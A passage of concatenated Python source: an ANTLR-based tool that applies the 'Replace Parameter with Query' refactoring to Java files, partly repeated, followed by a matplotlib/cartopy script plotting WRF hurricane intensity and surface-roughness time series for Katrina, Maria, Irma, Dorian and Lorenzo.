        for local_variable in self.local_variables:
            flag = False
            variable_declarator = local_variable.variableDeclarators()
            remaining_variables = []
            # Children alternate: declarator, ',', declarator, ...
            for i in range(len(variable_declarator.children)):
                if i % 2 == 0:
                    vd = variable_declarator.children[i]
                    if expression.getText() != vd.variableDeclaratorId().getText():
                        remaining_variables.append(vd.getText())
                    else:
                        self.add_to_target_method.append(vd.variableInitializer().getText())
                        flag = True
            if len(remaining_variables) == 0:
                # Sole declarator matched: drop the entire declaration statement.
                parent_ctx = local_variable.parentCtx
                self.token_stream_rewriter.delete(
                    program_name=self.token_stream_rewriter.DEFAULT_PROGRAM_NAME,
                    from_idx=parent_ctx.start.tokenIndex,
                    to_idx=parent_ctx.stop.tokenIndex
                )
            elif len(remaining_variables) < (len(variable_declarator.children) + 1) // 2:
                # Some declarators survive: rewrite the list without the match.
                # BUG FIX: the original f"{", ".join(...)}" nests double quotes
                # inside a double-quoted f-string (a SyntaxError before Python
                # 3.12); a plain join produces the identical string.
                self.token_stream_rewriter.replaceRange(
                    from_idx=variable_declarator.start.tokenIndex,
                    to_idx=variable_declarator.stop.tokenIndex,
                    text=", ".join(remaining_variables)
                )
            if flag:
                break

    def enterMethodCall0(self, ctx: JavaParserLabeled.MethodCall0Context):
        self.current_method_call = ctx.IDENTIFIER().getText()

    def exitMethodCall0(self, ctx: JavaParserLabeled.MethodCall0Context):
        self.current_method_call = None

    # in method call
    def enterExpressionList(self, ctx: JavaParserLabeled.ExpressionListContext):
        """At a call of the target method, collect the removed arguments and
        rewrite the argument list with the survivors only."""
        if self.current_method_call == self.target_method:
            expressions = []
            # Children alternate: expression, ',', expression, ...
            for i in range(len(ctx.children)):
                if i % 2 == 0:
                    if (i // 2) in self.target_parameters:
                        self.removed_expressions.append(ctx.children[i])
                    else:
                        expressions.append(ctx.children[i].getText())
            # BUG FIX: plain join instead of the pre-3.12-invalid nested-quote f-string.
            self.token_stream_rewriter.replaceRange(
                from_idx=ctx.start.tokenIndex,
                to_idx=ctx.stop.tokenIndex,
                text=", ".join(expressions)
            )

    # method body
    def exitCompilationUnit(self, ctx: JavaParserLabeled.CompilationUnitContext):
        """Rewrite the target declaration: drop the removed parameters and
        insert them as locals (queries on the object parameter) in the body."""
        temp = ""
        if self.target_method_obj is not None:
            print("self", self.index_of_parameter)
            # declaration
            ctx = self.target_method_obj
            text = ''
            formal_parameter_list = ctx.formalParameters().formalParameterList()
            print("b", ctx.formalParameters().formalParameterList().getText()[1])
            survived_parameters = []
            # First pass: find the name of the surviving "object" parameter.
            for j in range(len(formal_parameter_list.children)):
                if j % 2 == 0:
                    if (j // 2) not in self.target_parameters:
                        if j // 2 == self.index_of_parameter:
                            parameter = formal_parameter_list.children[j]
                            parameter_vdi = parameter.variableDeclaratorId().getText()
                            temp = parameter_vdi
            # Second pass: build local declarations for removed parameters and
            # collect the surviving parameter list.
            for i in range(len(formal_parameter_list.children)):
                if i % 2 == 0:
                    if (i // 2) in self.target_parameters:
                        parameter = formal_parameter_list.children[i]
                        parameter_type = parameter.typeType().getText()
                        parameter_vdi = parameter.variableDeclaratorId().getText()
                        print("i", i)
                        print("target", parameter_vdi)
                        parameter_initializer = self.add_to_target_method[0]
                        # e.g. "Type name = obj.name;\n\t\t"
                        text += parameter_type + ' ' + parameter_vdi + ' = ' + temp + '.' + parameter_vdi \
                                + ';' + "\n" + "\t" + "\t"
                        self.add_to_target_method.remove(parameter_initializer)
                    else:
                        parameter = formal_parameter_list.children[i]
                        parameter_type = parameter.typeType().getText()
                        parameter_vdi = parameter.variableDeclaratorId().getText()
                        survived_parameters.append(parameter_type + ' ' + parameter_vdi)
            # Rewrite the declaration's parameter list with the survivors only.
            # BUG FIX: plain join instead of the pre-3.12-invalid nested-quote f-string.
            self.token_stream_rewriter.replaceRange(
                from_idx=formal_parameter_list.start.tokenIndex,
                to_idx=formal_parameter_list.stop.tokenIndex,
                text=", ".join(survived_parameters)
            )
            # Insert the generated locals just before the first body statement.
            block_statement = ctx.methodBody().block().blockStatement()[0]
            self.token_stream_rewriter.insertAfter(
                index=block_statement.start.tokenIndex - 1,
                text=text
            )
class ReplaceParameterWithQueryAPI:
    """Facade: parse a Java source file, run the Replace-Parameter-with-Query
    listener over it, and write the rewritten source back to the same path."""

    def __init__(self, file_path, target_class, target_method, target_parameters):
        self.file_path = file_path
        self.new_file_path = file_path  # the file is rewritten in place
        self.target_class = target_class
        self.target_method = target_method
        self.target_parameters = target_parameters
        # ANTLR pipeline: file stream -> lexer -> token stream -> parser -> tree.
        self.stream = FileStream(self.file_path, encoding="utf8")
        self.lexer = JavaLexer(self.stream)
        self.token_stream = CommonTokenStream(self.lexer)
        self.parser = JavaParserLabeled(self.token_stream)
        self.tree = self.parser.compilationUnit()
        self.walker = ParseTreeWalker()

    def do_refactor(self):
        """Walk the parse tree with the refactoring listener and persist the result."""
        refactoring_listener = ReplaceParameterWithQueryListener(
            common_token_stream=self.token_stream,
            target_class=self.target_class,
            target_method=self.target_method,
            target_parameters=self.target_parameters
        )
        self.walker.walk(listener=refactoring_listener, t=self.tree)
        # Debug output: queued initializers, then the rewritten source.
        print(refactoring_listener.add_to_target_method)
        rewritten_source = refactoring_listener.token_stream_rewriter.getDefaultText()
        print(rewritten_source)
        with open(self.new_file_path, mode="w", newline="") as out:
            out.write(rewritten_source)
if __name__ == '__main__':
    # Example invocation: replace parameter #1 of availableVacation() in the
    # sample Java file with a query on the surviving object parameter.
    ReplaceParameterWithQueryAPI(
        file_path="/data/Dev/JavaSample/src/ReplaceParameterWithQuery.java",
        target_class='ReplaceParameterWithQuery',
        target_method="availableVacation",
        target_parameters=[1, ],
        # index from 0
    ).do_refactor()
| from antlr4 import *
from antlr4.TokenStreamRewriter import TokenStreamRewriter
from gen.java.JavaLexer import JavaLexer
from gen.javaLabeled.JavaParserLabeled import JavaParserLabeled
from gen.javaLabeled.JavaParserLabeledListener import JavaParserLabeledListener
# Method parameters are obtained with formalParameters().formalParameterList().
# Formal parameters are the ones that appear in the method declaration;
# parameters at a method call site come from expressionList/expression.
"""
To implement the Replace Parameter with Query refactoring:
taking the removable parameters into account, find the new object in the method declaration,
delete the target parameters in both the method call and the declaration,
and insert the removed parameters into the method body.
"""
class ReplaceParameterWithQueryListener(JavaParserLabeledListener):
    """ANTLR listener for the "Replace Parameter with Query" refactoring.

    For the target method (or constructor) of the target class this listener:
      * strips the target parameters from every call site and from the
        declaration, and
      * re-introduces each removed parameter as a local variable at the top of
        the method body, initialized as a query on the surviving "object"
        parameter.
    """

    # constructor
    def __init__(self, common_token_stream: CommonTokenStream = None,
                 target_class: str = None, target_method: str = None,
                 target_parameters: list = None):
        """Validate inputs and initialize traversal state.

        :param common_token_stream: token stream of the parsed file (required).
        :param target_class: name of the class owning the method (required).
        :param target_method: name of the method/constructor to refactor (required).
        :param target_parameters: zero-based indices of the parameters to replace.
        :raises ValueError: if a required argument is None.
        """
        if common_token_stream is None:
            raise ValueError("common token stream is None")
        self.token_stream_rewriter = TokenStreamRewriter(common_token_stream)
        if target_class is None:
            raise ValueError("target class is None")
        self.target_class = target_class
        if target_method is None:
            raise ValueError("target method is None")
        self.target_method = target_method
        self.target_parameters = [] if target_parameters is None else target_parameters

        # --- traversal state ---
        self.current_class = None          # name of the class being visited
        self.current_method = None         # name of the method being visited
        self.current_method_call = None    # name of the method call being visited
        self.target_method_obj = None      # declaration ctx of the target method
        self.removed_expressions = []      # argument ctxs removed from call sites
        self.local_variables = []          # local-variable-declaration ctxs in scope
        self.add_to_target_method = []     # initializer texts to insert into the body
        self.index_of_parameter = 0        # index of the "object" parameter

    def enterClassDeclaration(self, ctx: JavaParserLabeled.ClassDeclarationContext):
        self.current_class = ctx.IDENTIFIER().getText()

    def exitClassDeclaration(self, ctx: JavaParserLabeled.ClassDeclarationContext):
        self.current_class = None

    def enterMethodDeclaration(self, ctx: JavaParserLabeled.MethodDeclarationContext):
        self.current_method = ctx.IDENTIFIER().getText()
        if self.current_method == self.target_method and self.current_class == self.target_class:
            self.target_method_obj = ctx

    def exitMethodDeclaration(self, ctx: JavaParserLabeled.MethodDeclarationContext):
        self.FindObjrctIndex()

    def enterConstructorDeclaration(self, ctx: JavaParserLabeled.ConstructorDeclarationContext):
        self.current_method = ctx.IDENTIFIER().getText()
        if self.current_method == self.target_method and self.current_class == self.target_class:
            self.target_method_obj = ctx

    def exitConstructorDeclaration(self, ctx: JavaParserLabeled.ConstructorDeclarationContext):
        self.FindObjrctIndex()

    def FindObjrctIndex(self):
        """Process the arguments removed from call sites in this method.

        Bare-identifier arguments get their local declaration deleted via
        ``removeExpression``; other expressions are queued for re-insertion
        into the target method body.

        NOTE: the method name keeps its historical typo ("Objrct") so any
        external callers are unaffected.
        """
        i = 0
        for expression in self.removed_expressions:
            if type(expression) is JavaParserLabeled.Expression0Context and \
                    type(expression.primary()) is JavaParserLabeled.Primary4Context:
                # A bare identifier: delete its local declaration instead.
                self.removeExpression(expression)
            else:
                self.add_to_target_method.append(expression.getText())
            # find index of target object
            # NOTE(review): placement reconstructed from mangled indentation;
            # this leaves index_of_parameter at the last removed expression's
            # index -- confirm against the original intent.
            self.index_of_parameter = i
            i += 1
        # Reset per-method state for the next declaration.
        self.removed_expressions = []
        self.local_variables = []
        self.current_method = None

    def enterLocalVariableDeclaration(self, ctx: JavaParserLabeled.LocalVariableDeclarationContext):
        # BUG FIX: keep the ctx itself rather than ctx.getText().
        # removeExpression() calls .variableDeclarators() on these entries,
        # which raised AttributeError on a plain str.
        self.local_variables.append(ctx)

    # delete in method call
    def removeExpression(self, expression):
        """Delete the local-variable declarator matching `expression`.

        If it is the only declarator, the whole declaration statement is
        deleted; otherwise the declarator list is rewritten without it. The
        matched declarator's initializer text is queued for the method body.
        """
        for local_variable in self.local_variables:
            flag = False
            variable_declarator = local_variable.variableDeclarators()
            remaining_variables = []
            # Children alternate: declarator, ',', declarator, ...
            for i in range(len(variable_declarator.children)):
                if i % 2 == 0:
                    vd = variable_declarator.children[i]
                    if expression.getText() != vd.variableDeclaratorId().getText():
                        remaining_variables.append(vd.getText())
                    else:
                        self.add_to_target_method.append(vd.variableInitializer().getText())
                        flag = True
            if len(remaining_variables) == 0:
                # Sole declarator matched: drop the entire declaration statement.
                parent_ctx = local_variable.parentCtx
                self.token_stream_rewriter.delete(
                    program_name=self.token_stream_rewriter.DEFAULT_PROGRAM_NAME,
                    from_idx=parent_ctx.start.tokenIndex,
                    to_idx=parent_ctx.stop.tokenIndex
                )
            elif len(remaining_variables) < (len(variable_declarator.children) + 1) // 2:
                # Some declarators survive: rewrite the list without the match.
                # (Plain join is equivalent to the original f-string wrapper.)
                self.token_stream_rewriter.replaceRange(
                    from_idx=variable_declarator.start.tokenIndex,
                    to_idx=variable_declarator.stop.tokenIndex,
                    text=", ".join(remaining_variables)
                )
            if flag:
                break

    def enterMethodCall0(self, ctx: JavaParserLabeled.MethodCall0Context):
        self.current_method_call = ctx.IDENTIFIER().getText()

    def exitMethodCall0(self, ctx: JavaParserLabeled.MethodCall0Context):
        self.current_method_call = None

    # in method call
    def enterExpressionList(self, ctx: JavaParserLabeled.ExpressionListContext):
        """At a call of the target method, collect the removed arguments and
        rewrite the argument list with the survivors only."""
        if self.current_method_call == self.target_method:
            expressions = []
            # Children alternate: expression, ',', expression, ...
            for i in range(len(ctx.children)):
                if i % 2 == 0:
                    if (i // 2) in self.target_parameters:
                        self.removed_expressions.append(ctx.children[i])
                    else:
                        expressions.append(ctx.children[i].getText())
            self.token_stream_rewriter.replaceRange(
                from_idx=ctx.start.tokenIndex,
                to_idx=ctx.stop.tokenIndex,
                text=", ".join(expressions)
            )

    # method body
    def exitCompilationUnit(self, ctx: JavaParserLabeled.CompilationUnitContext):
        """Rewrite the target declaration: drop the removed parameters and
        insert them as locals (queries on the object parameter) in the body."""
        temp = ""
        if self.target_method_obj is not None:
            print("self", self.index_of_parameter)
            # declaration
            ctx = self.target_method_obj
            text = ''
            formal_parameter_list = ctx.formalParameters().formalParameterList()
            print("b", ctx.formalParameters().formalParameterList().getText()[1])
            survived_parameters = []
            # First pass: find the name of the surviving "object" parameter.
            for j in range(len(formal_parameter_list.children)):
                if j % 2 == 0:
                    if (j // 2) not in self.target_parameters:
                        if j // 2 == self.index_of_parameter:
                            parameter = formal_parameter_list.children[j]
                            parameter_vdi = parameter.variableDeclaratorId().getText()
                            temp = parameter_vdi
            # Second pass: build local declarations for removed parameters and
            # collect the surviving parameter list.
            for i in range(len(formal_parameter_list.children)):
                if i % 2 == 0:
                    if (i // 2) in self.target_parameters:
                        parameter = formal_parameter_list.children[i]
                        parameter_type = parameter.typeType().getText()
                        parameter_vdi = parameter.variableDeclaratorId().getText()
                        print("i", i)
                        print("target", parameter_vdi)
                        parameter_initializer = self.add_to_target_method[0]
                        # e.g. "Type name = obj.name;\n\t\t"
                        text += parameter_type + ' ' + parameter_vdi + ' = ' + temp + '.' + parameter_vdi \
                                + ';' + "\n" + "\t" + "\t"
                        self.add_to_target_method.remove(parameter_initializer)
                    else:
                        parameter = formal_parameter_list.children[i]
                        parameter_type = parameter.typeType().getText()
                        parameter_vdi = parameter.variableDeclaratorId().getText()
                        survived_parameters.append(parameter_type + ' ' + parameter_vdi)
            # Rewrite the declaration's parameter list with the survivors only.
            self.token_stream_rewriter.replaceRange(
                from_idx=formal_parameter_list.start.tokenIndex,
                to_idx=formal_parameter_list.stop.tokenIndex,
                text=", ".join(survived_parameters)
            )
            # Insert the generated locals just before the first body statement.
            block_statement = ctx.methodBody().block().blockStatement()[0]
            self.token_stream_rewriter.insertAfter(
                index=block_statement.start.tokenIndex - 1,
                text=text
            )
class ReplaceParameterWithQueryAPI:
    """Facade that parses a Java source file, applies the
    ReplaceParameterWithQueryListener refactoring, and writes the result
    back to `file_path` (the file is rewritten in place)."""

    def __init__(self, file_path, target_class, target_method, target_parameters):
        """Parse `file_path` and prepare the tree walker.

        :param file_path: path of the Java source file to refactor.
        :param target_class: class containing the target method.
        :param target_method: method whose parameters are replaced.
        :param target_parameters: zero-based parameter indices to replace.
        """
        self.file_path = file_path
        # Output path equals the input path: the refactoring is done in place.
        self.new_file_path = file_path
        self.target_class = target_class
        self.target_method = target_method
        self.target_parameters = target_parameters
        # ANTLR pipeline: file stream -> lexer -> token stream -> parser -> tree.
        self.stream = FileStream(self.file_path, encoding="utf8")
        self.lexer = JavaLexer(self.stream)
        self.token_stream = CommonTokenStream(self.lexer)
        self.parser = JavaParserLabeled(self.token_stream)
        self.tree = self.parser.compilationUnit()
        self.walker = ParseTreeWalker()

    def do_refactor(self):
        """Run the listener over the parse tree and write the rewritten source."""
        listener = ReplaceParameterWithQueryListener(
            common_token_stream=self.token_stream,
            target_class=self.target_class,
            target_method=self.target_method,
            target_parameters=self.target_parameters
        )
        self.walker.walk(
            listener=listener,
            t=self.tree
        )
        # Debug output: queued initializers and the rewritten source.
        print(listener.add_to_target_method)
        print(listener.token_stream_rewriter.getDefaultText())
        with open(self.new_file_path, mode="w", newline="") as f:
            f.write(listener.token_stream_rewriter.getDefaultText())
if __name__ == '__main__':
    # Example invocation: replace parameter #1 of availableVacation() in the
    # sample Java file with a query on the surviving object parameter.
    ReplaceParameterWithQueryAPI(
        file_path="/data/Dev/JavaSample/src/ReplaceParameterWithQuery.java",
        target_class='ReplaceParameterWithQuery',
        target_method="availableVacation",
        target_parameters=[1, ],
        # index from 0
    ).do_refactor()
|
import csv
import matplotlib.pyplot as plt
import numpy as np
from collections import OrderedDict
import matplotlib as mpl
# import matplotlib.gridspec as gridspec
from matplotlib.ticker import MaxNLocator
from matplotlib.ticker import StrMethodFormatter
import matplotlib.font_manager as font_manager
from matplotlib.patches import Patch
import string
from netCDF4 import Dataset
import json
from cartopy.feature import NaturalEarthFeature
import cartopy.crs as crs
import pickle
from wrf import (to_np, getvar, smooth2d, get_cartopy, cartopy_xlim,
cartopy_ylim, latlon_coords)
import cartopy
import os
from PIL import Image
# Pillow: lift the decompression-bomb size limit so very large background
# map images can be opened.
Image.MAX_IMAGE_PIXELS = None
map_location = "C:/Users/limgr/.spyder-py3/Map"
# Register the local background-image directory with cartopy
# (consumed later by ax.background_img).
os.environ["CARTOPY_USER_BACKGROUNDS"] = map_location
# List the colors that will be used for tracing the track.
csfont = {'fontname':'Times New Roman'}
font = font_manager.FontProperties(family='Times New Roman', size=30)
fontbar = font_manager.FontProperties(family='Times New Roman', size=12)
font_wt = font_manager.FontProperties(family='Times New Roman', size=20)
colors = ['k','blue','cyan','gray', 'red', \
          'blue', 'cyan', 'lightcoral', 'turquoise','red','blue','green','pink']
patterns = ['-', '--','-.','-',':',':','--','--', ':','-', '--', ':','-', '--', ':',\
            '-.', '-.', '-.', ':', '--', '-']
markers = ['s','D','^','o','*','s','+','x','X','D','^','<','>','v']
sizes = [7, 7, 7, 7, 7, 3, 4, 3, 3, 3, 3, 3, 6,5,4,3,2,2]
# Legend labels: observed best track plus the four surface-roughness (Clz) runs.
options = ["Best Track",\
           "Clz=0.0001",\
           "Clz=0.01",\
           "Clz=1",\
           "Clz=100"]
models = ["Clz = 0.0001",\
          "Clz = 0.01",\
          "Clz = 1",\
          "Clz = 100"]
hurricanes = ["Katrina",\
              "Maria",\
              "Irma",\
              "Dorian",\
              "Lorenzo"]
# subplot positions
position = [[0,0,2],[0,2,4],[0,4,6],[1,0,2],[1,2,4]]
position2 = [[0,4,0,7],[0,4,8,15],[0,4,16,23],[5,9,0,7],[5,9,8,15]]
# Named dash patterns used as line styles via list(linestyles.values())[idx].
# NOTE(review): the key 'dashed' appears twice with the same value; the
# duplicate collapses, so the mapping holds 13 entries, not 14 - confirm
# downstream indices still pick the intended styles.
linestyles = OrderedDict(
    [('solid', (0, ())),
     ('dashdotted', (0, (3, 3, 1, 3))),
     ('dashdotdotted', (0, (3, 2, 1, 2, 1, 2))),
     ('dashed', (0, (3, 3))),
     ('dotted', (0, (1, 3))),
     ('dashed', (0, (3, 3))),
     ('loosely dotted', (0, (1, 10))),
     ('densely dotted', (0, (1, 1))),
     ('loosely dashed', (0, (5, 10))),
     ('densely dashed', (0, (5, 1))),
     ('loosely dashdotted', (0, (3, 10, 1, 10))),
     ('densely dashdotted', (0, (3, 1, 1, 1))),
     ('loosely dashdotdotted', (0, (3, 10, 1, 10, 1, 10))),
     ('densely dashdotdotted', (0, (3, 1, 1, 1, 1, 1)))])
R = 6373.0 # approximate radius of earth in km (haversine distance scale)
# folder for wi and wt files
dir_wi = ['C:/Users/limgr/Desktop/Katrina_wind_intensity_16km.csv',\
          'C:/Users/limgr/Desktop/Maria_wind_intensity_16km.csv',\
          'C:/Users/limgr/Desktop/Irma_wind_intensity_16km.csv',\
          'C:/Users/limgr/Desktop/Dorian_wind_intensity_16km.csv',\
          'C:/Users/limgr/Desktop/Lorenzo_wind_intensity_16km.csv']
dir_wt = ['C:/Users/limgr/Desktop/Katrina_track_16km.txt',\
          'C:/Users/limgr/Desktop/Maria_track_16km.txt',\
          'C:/Users/limgr/Desktop/Irma_track_16km.txt',\
          'C:/Users/limgr/Desktop/Dorian_track_16km.txt',\
          'C:/Users/limgr/Desktop/Lorenzo_track_16km.txt']
# Pickled 2-D fields used to recover the WRF map projection for each storm.
dir_p = ['C:/Users/limgr/Desktop/Katrina_16km.p',\
         'C:/Users/limgr/Desktop/Maria_16km.p',\
         'C:/Users/limgr/Desktop/Irma_16km.p',\
         'C:/Users/limgr/Desktop/Dorian_16km.p',\
         'C:/Users/limgr/Desktop/Lorenzo_16km.p']
dir_znt_eye = ['C:/Users/limgr/Desktop/Katrina_ZNT_eye_16km.csv',\
               'C:/Users/limgr/Desktop/Maria_ZNT_eye_16km.csv',\
               'C:/Users/limgr/Desktop/Irma_ZNT_eye_16km.csv',\
               'C:/Users/limgr/Desktop/Dorian_ZNT_eye_16km.csv',\
               'C:/Users/limgr/Desktop/Lorenzo_ZNT_eye_16km.csv']
dir_znt_eyewall = ['C:/Users/limgr/Desktop/Katrina_ZNT_eyewall_16km.csv',\
                   'C:/Users/limgr/Desktop/Maria_ZNT_eyewall_16km.csv',\
                   'C:/Users/limgr/Desktop/Irma_ZNT_eyewall_16km.csv',\
                   'C:/Users/limgr/Desktop/Dorian_ZNT_eyewall_16km.csv',\
                   'C:/Users/limgr/Desktop/Lorenzo_ZNT_eyewall_16km.csv']
dir_wp = ['C:/Users/limgr/Desktop/Katrina_avg_speed_16km.csv', \
          'C:/Users/limgr/Desktop/Maria_avg_speed_16km.csv', \
          'C:/Users/limgr/Desktop/Irma_avg_speed_16km.csv', \
          'C:/Users/limgr/Desktop/Dorian_avg_speed_16km.csv', \
          'C:/Users/limgr/Desktop/Lorenzo_avg_speed_16km.csv']
# Map extents per hurricane - presumably [lon_min, lon_max, lat_min, lat_max]
# as passed to ax.set_extent; TODO confirm axis order.
# NOTE(review): lat_log_bound is assigned three times in a row; only the
# final assignment takes effect - the first two are dead values.
lat_log_bound = [[-90.5, -84.5, 23, 29],\
                 [-74, -68, 19.5, 25.5],\
                 [-47, -39, 14, 22],\
                 [-76.5, -70.5, 23, 29],\
                 [-45.5, -39.5, 16.5, 22.5]]
lat_log_bound = [[-93, -83, 24, 34],\
                 [-77, -67, 19, 29],\
                 [-51, -39, 14, 22],\
                 [-80, -69, 23, 29],\
                 [-47, -40, 16.5, 25.5]]
lat_log_bound = [[-91, -85, 24, 30],\
                 [-77, -67, 19, 29],\
                 [-51, -39, 14, 22],\
                 [-78, -70, 23, 29],\
                 [-47, -40, 16.5, 25.5]]
# lat_log_bound = [[-92, -86, 25, 30],\
#                  [-74, -68, 21.5, 25.5],\
#                  [-46, -43.5, 17, 19.5],\
#                  [-76, -73.5, 25.5, 28],\
#                  [-46, -42, 19, 23]]
def Calculate_Distance_Haversine1(x):
    """Haversine term sin^2(d/2) of the first component of *x* (radians).

    Used on the latitude-difference axis of the track-error computation.
    """
    half_delta = x[0] / 2
    return np.sin(half_delta) ** 2
def Calculate_Distance_Haversine2(x):
    """Haversine cosine factor: cos of the first component of *x* (radians)."""
    lat = x[0]
    return np.cos(lat)
def Calculate_Distance_Haversine3(x):
    """Haversine term sin^2(d/2) of the second component of *x* (radians).

    Used on the longitude-difference axis of the track-error computation.
    """
    half_delta = x[1] / 2
    return np.sin(half_delta) ** 2
#########################################
# Plot normalized intensity time series #
#########################################
# One subplot per hurricane: wind-intensity series for the best track
# (converted from knots) plus each Clz roughness run.
fig = plt.figure(figsize=(20,13))
spec = mpl.gridspec.GridSpec(ncols=23, nrows=9)
for kk in range(len(hurricanes)):
    c=0  # series counter: indexes colors/linestyles/sizes per plotted curve
    rows=[]
    Times=[]
    Times=[]  # NOTE(review): duplicate initialization; the second binding is redundant
    values=[]
    # Read this hurricane's intensity CSV: header -> Times, each row -> values.
    with open(dir_wi[kk], mode='r') as csv_file:
        csv_reader = csv.DictReader(csv_file)
        line_count = 0
        for row in csv_reader:
            if line_count == 0:
                # NOTE(review): nested same-quote f-string requires Python 3.12+ (PEP 701).
                print(f'Column names are {', '.join(row)}')
                Times.append(list(row.keys()))
                line_count += 1
            #print(row)
            # NOTE(review): the first data row is appended to values as well,
            # and line_count is incremented twice for it - confirm intended.
            rows.append(row)
            values.append(list(row.values()))
            line_count += 1
        print(f'Processed {line_count} lines.')
    Times0=Times[0]  # CSV column names, used as the time axis
    print(Times0)
    print(values[0])
    print(position[kk])
    # Subplot span taken from the position2 grid table.
    ax = fig.add_subplot(spec[position2[kk][0]:position2[kk][1],\
                              position2[kk][2]:position2[kk][3]])
    # Panel label '(a)', '(b)', ...
    ax.text(0.05, 0.85, '('+string.ascii_lowercase[kk]+')', transform=ax.transAxes,
            size=30, **csfont)
    for i in range(0,line_count-1):
        if i==0:
            # First series: convert knots to m/s (factor 0.5144444).
            # NOTE(review): the comprehension variable i shadows the loop index.
            tmp=[float(i)*0.5144444 for i in values[i]]
            #tmp=[float(i) for i in values[i]]
        # elif (i!=2 and i!=3):
        else:
            tmp=[float(i) for i in values[i]]
        # else:
        #     continue
        # Katrina and Dorian have shorter usable records; trim their series.
        if hurricanes[kk]=='Katrina':
            plt.plot( Times0[:5], tmp[:5], color = colors[c], \
                      linestyle=list(linestyles.values())[c],\
                      linewidth=5, markersize=sizes[c])
            plt.xticks(fontsize=25, **csfont)
            plt.yticks(fontsize=25, **csfont)
            plt.ylim([25, 80])
        elif hurricanes[kk]=='Dorian':
            plt.plot( Times0[:-2], tmp[:-2], color = colors[c], \
                      linestyle=list(linestyles.values())[c],\
                      linewidth=5, markersize=sizes[c])
            plt.xticks(fontsize=25, **csfont)
            plt.yticks(fontsize=25, **csfont)
            plt.ylim([25, 80])
        else:
            plt.plot( Times0, tmp, color = colors[c], \
                      linestyle=list(linestyles.values())[c],\
                      linewidth=5, markersize=sizes[c])
            plt.xticks(fontsize=25, **csfont)
            plt.yticks(fontsize=25, **csfont)
            plt.gca().yaxis.set_major_formatter(StrMethodFormatter('{x:,.0f}'))
            plt.ylim([25, 80])
        c+=1
    # Thicken the subplot frame and tick marks.
    for axis in ['top','bottom','left','right']:
        ax.spines[axis].set_linewidth(2)
    ax.tick_params(length=5, width=2)
    # NOTE(review): the figure-level legend is re-added on every iteration.
    fig.legend(options, bbox_to_anchor=(0.87, 0.42), prop=font, \
               frameon=False)
    if kk==0 or kk==3:
        plt.ylabel(r'Intensity (m/s)', **csfont, fontsize=35)
    if kk==2 or kk==3 or kk==4:
        plt.xlabel(r"Time Series (hr)", fontsize=30, **csfont)
    plt.title(hurricanes[kk], {'size': 30}, **csfont)
# Saved once after the loop; kk retains its last value, so the file name
# carries the last hurricane's name.
plt.savefig('C:/Users/limgr/Desktop/'+hurricanes[kk]+'_wind_intensity_A.png', dpi=500)
plt.show()
########################
# Plot ZNT time series #
########################
# One subplot per hurricane: roughness length (Z0) in the eye region,
# log-scaled, one curve per Clz run (note the c+1 style offset - index 0
# is reserved for the best-track style used in other figures).
fig = plt.figure(figsize=(20,13))
spec = mpl.gridspec.GridSpec(ncols=23, nrows=9)
for kk in range(len(hurricanes)):
    c=0  # series counter; styles are indexed with c+1 in this figure
    rows=[]
    Times=[]
    Times=[]  # NOTE(review): duplicate initialization; the second binding is redundant
    values=[]
    # Read this hurricane's eye-region ZNT CSV: header -> Times, rows -> values.
    with open(dir_znt_eye[kk], mode='r') as csv_file:
        csv_reader = csv.DictReader(csv_file)
        line_count = 0
        for row in csv_reader:
            if line_count == 0:
                # NOTE(review): nested same-quote f-string requires Python 3.12+ (PEP 701).
                print(f'Column names are {', '.join(row)}')
                Times.append(list(row.keys()))
                line_count += 1
            #print(row)
            # NOTE(review): the first data row is appended to values as well,
            # and line_count is incremented twice for it - confirm intended.
            rows.append(row)
            values.append(list(row.values()))
            line_count += 1
        print(f'Processed {line_count} lines.')
    Times0=Times[0]  # CSV column names, used as the time axis
    print(Times0)
    print(values[0])
    print(position[kk])
    ax = fig.add_subplot(spec[position2[kk][0]:position2[kk][1],\
                              position2[kk][2]:position2[kk][3]])
    # Panel label '(a)', '(b)', ...
    ax.text(0.05, 0.85, '('+string.ascii_lowercase[kk]+')', transform=ax.transAxes,
            size=30, **csfont)
    for i in range(0,line_count-1):
        if i==0:
            #tmp=[float(i)*0.5144444 for i in values[i]]
            # NOTE(review): the comprehension variable i shadows the loop index.
            tmp=[float(i) for i in values[i]]
        # elif (i!=2 and i!=3):
        else:
            tmp=[float(i) for i in values[i]]
        # else:
        #     continue
        # Katrina and Dorian have shorter usable records; trim their series.
        if hurricanes[kk]=='Katrina':
            plt.plot( Times0[:5], tmp[:5], color = colors[c+1], \
                      linestyle=list(linestyles.values())[c+1],\
                      linewidth=5, markersize=sizes[c+1])
            plt.xticks(fontsize=25, **csfont)
            plt.yticks(fontsize=25, **csfont)
            plt.ylim([1e-11, 3.0])
            plt.yscale('log')
        elif hurricanes[kk]=='Dorian':
            plt.plot( Times0[:-2], tmp[:-2], color = colors[c+1], \
                      linestyle=list(linestyles.values())[c+1],\
                      linewidth=5, markersize=sizes[c+1])
            plt.xticks(fontsize=25, **csfont)
            plt.yticks(fontsize=25, **csfont)
            plt.ylim([1e-11, 3.0])
            plt.yscale('log')
        else:
            plt.plot( Times0, tmp, color = colors[c+1], \
                      linestyle=list(linestyles.values())[c+1],\
                      linewidth=5, markersize=sizes[c+1])
            plt.xticks(fontsize=25, **csfont)
            plt.yticks(fontsize=25, **csfont)
            plt.gca().yaxis.set_major_formatter(StrMethodFormatter('{x:,.0f}'))
            plt.ylim([1e-11, 3.0])
            plt.yscale('log')
        c+=1
    # Thicken the subplot frame and tick marks.
    for axis in ['top','bottom','left','right']:
        ax.spines[axis].set_linewidth(2)
    ax.tick_params(length=5, width=2)
    # NOTE(review): the figure-level legend is re-added on every iteration.
    fig.legend(models, bbox_to_anchor=(0.87, 0.42), prop=font, \
               frameon=False)
    if kk==0 or kk==3:
        plt.ylabel(r'$Z_0$ (m)', **csfont, fontsize=30)
    if kk==2 or kk==3 or kk==4:
        plt.xlabel(r"Time Series (hr)", fontsize=30, **csfont)
    plt.title(hurricanes[kk], {'size': 30}, **csfont)
# Saved once after the loop; file name carries the last hurricane's name.
plt.savefig('C:/Users/limgr/Desktop/'+hurricanes[kk]+'_ZNT_eye.png', dpi=500)
plt.show()
########################
# Plot ZNT time series #
########################
# Same layout as the eye-region figure above, but for the eyewall ZNT files.
fig = plt.figure(figsize=(20,13))
spec = mpl.gridspec.GridSpec(ncols=23, nrows=9)
for kk in range(len(hurricanes)):
    c=0  # series counter; styles are indexed with c+1 in this figure
    rows=[]
    Times=[]
    Times=[]  # NOTE(review): duplicate initialization; the second binding is redundant
    values=[]
    # Read this hurricane's eyewall ZNT CSV: header -> Times, rows -> values.
